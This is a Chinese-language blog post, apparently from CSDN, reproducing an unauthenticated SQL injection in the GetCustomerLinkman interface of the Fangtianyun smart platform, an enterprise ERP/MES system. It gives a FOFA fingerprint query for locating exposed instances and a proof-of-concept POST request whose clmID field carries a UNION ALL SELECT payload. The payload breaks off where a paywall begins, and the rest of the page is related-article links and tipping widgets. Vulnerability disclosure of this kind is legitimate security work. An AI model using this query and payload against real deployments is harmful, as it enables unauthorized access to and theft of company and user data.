方天云智慧平台系统 GetCustomerLinkman SQL注入漏洞复现

已于 2024-07-31 15:18:59 修改
阅读量188 收藏
点赞数 3
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-07-31 15:18:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/140823727
版权

0x01 产品简介

方天云智慧平台系统,作为方天科技公司的重要产品,是一款面向企业全流程的业务管理功能平台,集成了ERP(企业资源规划)、MES(车间执行系统)、APS(先进规划与排程)、PLM(产品生命周期)、CRM(客户关系管理)等多种功能模块,旨在通过云端服务为企业提供数字化、智能化的管理解决方案。

0x02 漏洞概述

方天云智慧平台系统 GetCustomerLinkman 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

FOFA:body="AjaxMethods.asmx/GetCompanyItem"

0x04 漏洞复现

PoC

POST /WXAPI.asmx/GetCustomerLinkman HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: application/json

{clmID:"1 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
方天云智慧平台系统 GetCompanyItem SQL注入漏洞复现
0xSec
07-25 176
方天云智慧平台系统 GetCompanyItem 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
ERPNext SQL 注入漏洞复现
0xSec
12-05 909
ERPNext frappe.model.db_query.get_list 文件 filters 参数存在 SQL 注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
平台默认管理员账号密码是多少?
Uniview400的博客
04-21 2497
Q:VM平台默认管理员账号密码是多少? A:账号admin,密码123456/admin,账号loadmin密码loadmin
HW漏洞威胁情报第七天|HW情报
最新发布
weixin_43167326的博客
07-31 449
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
依赖注入学习笔记
Q615749952的博客
02-24 224
Ioc概述 Ioc(Inversion Of Control)翻译为控制反转 首先明确没有反转的控制为"主动控制" 主动控制:我们在之前编写的所有代码都是主动控制,意思是程序运行过程中需要什么对象就实例化什么对象 控制反转:使用控制反转思想编写的代码是将所有程序会使用到的对象都保存到外部容器,需要时从容器中获取 创建Spring项目 创建Spring项目 使用Idea创建Maven项目然后添加Spring的依赖即可 修改之后当前项目的pom.xml文件如下 <?xml version="1.0"
Spring框架最终注解标签注入方法
Camel
01-27 527
使用注解装配bean 使用@Autowired注解 从Spring2.5开始,最有趣的一种装配Spring Bean的方式是使用注解自动装配Bean的属性。 Spring默认禁用注解装配,最简单的启用方式是使用Spring的context命名空间配置中的context:annotation-config元素,如下所示: &amp;lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;...
【CS224W】(task3)NetworkX工具包实践(地铁系统 | 城市交通)
发现问题,并解决问题,批判性思维
02-12 2011
一、Network创建图 1.1 创建内置图 (1)基础用图 (2)networkX自带数据集 (3)树 1.2 创建连接表和邻接表 1.3 添加节点 1.4 添加连接 二、美国城市交通关系无向图 2.1 构图 2.2 筛选出距离小于阈值的城市对 2.3 城市关系可视化 三、有向图可视化模板 四、国际象棋对局MultiDiGraph多路图可视化 4.1 创建图和连通域分析 4.2 设置边长和节点属性 4.3 可视化 五、北京上海地铁站图数据挖掘 5.1 读取数据 5.2 最短路径 5.3 地铁导航系统 5.
Spring框架构造器/属性值/自动装配bean注入
Camel
01-27 474
Spring的依赖注入方式有几种 接口注入 构造器注入 constructor-arg id = value 属性注入(访问器注入) 接口注入 相关:https://www.jianshu.com/p/63c4b1b62204 不需要写NEW的对象 和set 方法 &lt;!-- 构造方法注入 &lt;constructor-arg&gt; na...
基于OpenEuler的信创国产瘦客户机软件系统 DoraOS
云飞扬的桌面云
09-04 572
DoraOS是一款瘦客户机系统软件,最新版本基于OpenEuler开发。可以将主机转化为专业的瘦客户机。目前支持x86架构的硬件。 DoraOS基于OpenEuler开发,满足信创国产化的要求。具有良好的硬件兼容性。安装比较简单。 DoraOS界面简洁明了。协议丰富、RDP的特性很专业。带有日志功能,方便故障的诊断。 DoraOS还配套有VDClass、TCManager,可以远程的进行管理。
程序大师的方天画戟 - vicc
Vanquisher
05-21 1520
三国第一战将吕布,拥有两种宝物:一是赤兔马,二便是方天画戟简介vicc 是一款工作在64位Linux的控制台环境下的程序开发编辑器它的工作原理: (1).通过shell代码实现控制台的图形界面,引导用户去创建ctags和cscope的符号数据库,                           (2).通过shell代码实现控制台的图形界面,调用vim-7.4作为代码编辑器时自动加载ctags...
方天ERP系统基本操作教材
08-30
方天ERP系统基本操作教材,正确使用方天ERP系统的操作及技巧
01_方天Erp系统教育训练-系统维护
01-22
01_方天Erp系统教育训练-系统维护,方天ERP系统培训资料
方天B9(ERP)工艺排错或重复.docx
03-03
附图文及后台修改数据
方天Erp系统教育训练基本操作PPT学习教案.pptx
10-08
方天Erp系统教育训练基本操作PPT学习教案.pptx
ft-wl-fwk是 Wayland-protocol 的实现 该实现基于方天
02-27
Wayland-protocol是一种用于构建图形用户界面(GUI)的通信协议,它定义了窗口系统的基础,使得应用程序可以与显示服务器进行交互。方天,可能是这个实现的特定名称或者是项目的一部分,但具体信息需要进一步查阅...
深入探讨:如何在Shopee平台安全运营多个店铺?
Ssm2022的博客
07-24 730
因为每个IP相关信息会被收录形成独特的浏览器指纹,浏览器指纹是一种通过收集和识别用户浏览器特征来跟踪和识别用户的技术。在跨境电商中,特别是运营多个店铺的商家,浏览器指纹可能被电商平台用于判断账号之间的关联。所以,当Shopee检测到一IP多店铺时,会认为商家存在恶意倾销等行为,从而封禁你的账号。这是一个关乎账号安全和业务持续性的重要问题。浏览器保存的账号、密码、支付信息等数据,以及注册资料、法人信息的重复使用,也可能导致账号被关联。通过这些措施,卖家可以有效降低店铺被关联的风险,保障业务的持续和稳定发展。
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1051
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
网络安全自学从入门到精通的制胜攻略!!!
2301_77160226的博客
07-27 249
在信息时代,网络安全已成为至关重要的领域。越来越多的人希望通过自学掌握这门技术,开启充满挑战与机遇的职业道路。
“微软蓝屏”事件引发的深度思考:网络安全系统稳定性的挑战与应对
CWPIN21的博客
07-23 1346
近日,一次由微软视窗系统软件更新引发的全球性“微软蓝屏”事件,不仅成为科技领域的热点新闻,更是一次对全球IT基础设施韧性与安全性的深刻检验。这次事件,源于美国电脑安全技术公司“众击”提供的一个带有“缺陷”的软件更新,它如同一颗隐形炸弹,在全球范围内引爆,导致近850万台设备遭遇故障,横跨航空、医疗、传媒等众多关键行业,甚至造成美国超过2.3万架次航班延误,其影响之广令人震惊。面对如此大规模的系统中断,网络安全系统稳定性的讨论再次被推上风口浪尖。如何构建更加稳固和安全的网络环境?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值